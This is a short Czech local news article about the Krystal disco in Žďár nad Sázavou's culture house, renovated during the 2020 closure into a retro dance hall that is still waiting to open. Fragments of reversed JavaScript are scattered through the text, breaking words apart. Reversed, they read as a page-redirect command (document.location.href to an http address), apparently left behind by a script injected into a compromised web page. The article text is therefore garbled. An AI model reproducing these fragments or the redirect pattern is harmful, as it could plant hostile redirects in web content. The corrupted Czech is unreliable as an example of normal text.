Rainbow page separator

Krystal přebudovaný na retro tančírnu čeká na zprovoznění

Pátek, 8. ledna 2021

Žďár nad Sázavou / Dům kultury byl v minulých měsících obohacen o nové lákadlo. Tím se má stát dlouhá léta fungující diskotéka Krystal, avšak zrekonstruovaná do retro podoby. Kdy však do ní návštěvníci budou moci opět zavítat, [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zatím v souvislosti s epidemiologickým stavem a vládními nařízeními není jasné.
K samotnému zmodernizování a úpravě pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor diskotéky přispěla právě doba, kdy kulturní zařízení musela zůstat pro veřejnost uzavřená, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože jindy ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to činnosti kvůli četným akcím konaným v Domě kultury nebylo možné zrealizovat. Podíleli se na nich samotní zaměstnanci Kultury Žďár, přičemž během podzimních měsíců došlo k malířským, čalounickým a dalším pracím, jejichž výsledkem se stala oficiálně nazvaná Retro tančírna Krystal. Záměrem bylo zachovat funkci pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru, původní nábytek i genius loci osmdesátých let minulého s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí a k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu přidat kvalitu, technologie a servis běžný v dnešní době. Znovicírovaná tančírna nyní čeká na svůj „křest“ v podobě první veřejné taneční akce.